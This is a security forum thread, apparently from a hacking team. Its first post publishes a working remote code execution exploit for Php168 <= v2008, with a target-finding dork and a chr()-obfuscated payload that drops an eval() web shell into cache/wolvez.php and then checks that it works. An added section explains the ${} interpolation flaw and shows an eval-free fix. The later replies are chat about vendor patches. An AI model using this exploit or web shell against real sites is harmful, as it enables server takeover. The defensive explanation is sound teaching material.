Wolves Security Team

Unfortunately no one can be told what W.S.T is - you have to see it for yourself.


Announcement

Welcome cnryan to the wolf pack :-)



#1 2008-11-18 12:10:50

puret_t
Administrator
Registered: 2008-10-05
Posts: 86

Php168: a code execution bug that is about to be patched?

According to a reliable tip, someone has already found a similar vulnerability [not the same bug, but in the same file and using the same variable] and published it in 黑防 (Hacker Defense magazine). I expect the vendor will put out a patch soon, so this exploit of mine will probably be dead as well :)

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 <= v2008 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to php168
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

/**
 * the chr() chain keeps quotes out of the request body; it decodes to
 *   ${${fputs(fopen('cache/wolvez.php','w+'),'<?eval($_POST[c])?>puret_t')}}
 * PHP's ${...} string syntax treats the inner part as an expression, so fputs()
 * runs as a side effect once the value is interpolated (here via the target's eval())
 */
$cmd = 'makehtml=1&chdb[htmlname]=${${fputs(fopen(chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(119).chr(111).chr(108).chr(118).chr(101).chr(122).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(112).chr(117).chr(114).chr(101).chr(116).chr(95).chr(116))}}';
$shell = 'http://'.$host.$path.'cache/wolvez.php';
/**
 * wolvez.php has this code:
 * <?eval($_POST[c])?>puret_t
 * the trailing puret_t is the marker used by the success check below;
 * the short <? tag needs short_open_tag enabled on the target
 */
$resp = send($cmd);

/**
 * success check: fetching the dropped file runs the (empty) eval and echoes
 * the marker puret_t, so the response body must equal exactly that
 */
if ($resp && @file_get_contents($shell) == 'puret_t')
    exit("Exploit Success!\nView Your shell:\t$shell\n");
else 
    exit("Exploit Failed!\n");
    
function send($cmd)
{
    global $host, $path;
    
    // any script that reaches the vulnerable code path will do; digg.php is the default
    $message = "POST ".$path."digg.php HTTP/1.1\r\n";
    // $message = "POST ".$path."login.php HTTP/1.1\r\n";
    // $message = "POST ".$path."search.php HTTP/1.1\r\n";
    // $message = "POST ".$path."sendpwd.php HTTP/1.1\r\n";
    // $message = "POST ".$path."showsp.php HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    
    $fp = fsockopen($host, 80, $errno, $errstr, 30);
    if (!$fp)
        exit("Connection to $host failed: $errstr ($errno)\n");
    fputs($fp, $message);
    
    $resp = '';

    while (!feof($fp))
        $resp .= fread($fp, 1024);
    fclose($fp);
    
    return $resp;
}

?>

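The payload in the post above only works because PHP parses `${expr}` inside a double-quoted string as a variable-variable expression and evaluates `expr` (running any function call in it) before looking up the variable. The script below is an added example, not PHP168's code or puret_t's: the vulnerable application pattern is a hypothetical eval() of a double-quoted string that embeds a user-controlled template name (PHP168's real source is not on this page), and `build_name_vulnerable`, `build_name_safe` and the marker file path are assumptions made for the demo. It runs a payload of the same `${${...}}` shape as the exploit's `chdb[htmlname]` through both versions, with a harmless file write in place of the web shell drop.

```php
<?php
// Added example (not PHP168's or the thread author's code): the ${${...}}
// string-interpolation trick the exploit relies on, beside a renderer that
// does not eval. Requires PHP 7.4+ (arrow functions); the ${} string syntax
// is deprecated in PHP 8.2 but still executes.
//
// ASSUMPTION: the vulnerable pattern is a hypothetical reconstruction;
// PHP168's actual code is not on this page.

// Silence the "undefined variable" / deprecation noise the payload produces,
// so the side effect is the only thing visible.
error_reporting(E_ALL & ~(E_WARNING | E_NOTICE | E_DEPRECATED));

// Vulnerable pattern (hypothetical): builds an output file name by letting
// PHP expand {$var} placeholders through eval() of a double-quoted string.
function build_name_vulnerable(string $userTemplate, array $vars): string
{
    extract($vars);                          // $id, $title, ... visible to eval
    // User input lands inside "...", so "${expr}" is parsed as a
    // variable-variable and expr (any function call) is executed.
    eval('$name = "' . $userTemplate . '";');
    return $name;
}

// Hardened version: never eval. Substitute only known placeholders and
// reject anything that is not a plain file name.
function build_name_safe(string $userTemplate, array $vars): string
{
    $name = preg_replace_callback(
        '/\{\$?([a-z_][a-z0-9_]*)\}/i',
        fn(array $m) => isset($vars[$m[1]]) ? (string) $vars[$m[1]] : '',
        $userTemplate
    );
    // Whitelist: letters, digits, dot, dash, underscore; no "/", "$", "{", "(".
    if (!preg_match('/^[A-Za-z0-9._-]+\.html$/', $name)) {
        throw new InvalidArgumentException("rejected html name: $name");
    }
    return $name;
}

// Constructed demo data. $marker is the file the payload will try to create,
// standing in for cache/wolvez.php in the real exploit.
$marker = sys_get_temp_dir() . '/wst_demo_marker.txt';
@unlink($marker);
$vars = ['id' => 42, 'title' => 'news', 'marker' => $marker];

// Constructed payload, same shape as chdb[htmlname] above: the inner ${...}
// runs file_put_contents(), the outer ${...} swallows its return value.
// No quotes are needed because $marker and $title come from extract().
$payload = '${${file_put_contents($marker, $title)}}.html';

echo "vulnerable, legit template -> ", build_name_vulnerable('{$title}_{$id}.html', $vars), "\n";
echo "vulnerable, payload        -> ", build_name_vulnerable($payload, $vars), "\n";
echo "marker file written?       -> ", file_exists($marker) ? "yes" : "no", "\n";
@unlink($marker);

echo "safe, legit template       -> ", build_name_safe('{$title}_{$id}.html', $vars), "\n";
try {
    build_name_safe($payload, $vars);
} catch (InvalidArgumentException $e) {
    echo "safe, payload              -> ", $e->getMessage(), "\n";
}
echo "marker file written?       -> ", file_exists($marker) ? "yes" : "no", "\n";
```

Run it with `php demo.php`: the vulnerable path expands the legitimate template to `news_42.html`, but with the payload it creates the marker file and returns only `.html`, because file_put_contents() is executed during interpolation and its return value is used as a (nonexistent) variable name. The safe path returns the same legitimate name, refuses the payload, and never touches the file system. The fix is not to escape quotes (the exploit already avoids them with chr()); it is to stop handing user input to eval() at all and to whitelist the resulting file name.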

#2 2008-11-18 12:12:24

puret_t
Administrator
Registered: 2008-10-05
Posts: 86

Re: Php168: a code execution bug that is about to be patched?

Everyone should just play with it locally for now; php168 may, as usual, bring us surprises :)


#3 2008-11-18 13:25:44

flyh4t
Administrator
Registered: 2008-10-06
Posts: 89

Re: Php168: a code execution bug that is about to be patched?

By "surprise", do you mean another patch that doesn't fix things cleanly, like job.php?

Haha, bump


#4 2008-11-18 14:42:30

puret_t
Administrator
Registered: 2008-10-05
Posts: 86

Re: Php168: a code execution bug that is about to be patched?

Yeah. That file download vulnerability last time, the vendor patched it three or four times I think, and it still has problems today :)


#5 2008-11-19 13:28:50

q1ur3n
Administrator
Registered: 2008-10-05
Posts: 52

Re: Php168: a code execution bug that is about to be patched?

Haha, haven't had a magazine to read in a long time.
Does the 黑防 one also exploit it through variable functions?


#6 2008-11-19 14:08:07

puret_t
Administrator
Registered: 2008-10-05
Posts: 86

Re: Php168: a code execution bug that is about to be patched?

I heard from someone that the 黑防 one is a file write.


#7 2008-11-19 17:48:22

flyh4t
Administrator
Registered: 2008-10-06
Posts: 89

Re: Php168: a code execution bug that is about to be patched?

The eval() call appears earlier,
the file write shows up a few lines later.
I guess that author would be a bit depressed if he saw this exploit.


#8 2009-02-21 14:32:32

puret_t
Administrator
Registered: 2008-10-05
Posts: 86

Re: Php168: a code execution bug that is about to be patched?


#9 2010-01-01 23:17:52

puret_t
Administrator
Registered: 2008-10-05
Posts: 86

Re: Php168: a code execution bug that is about to be patched?

An old thing from 2008, but today I saw this exploit somewhere and was quite surprised at how it leaked out...
So I might as well move it out of the internal section.


Powered by FluxBB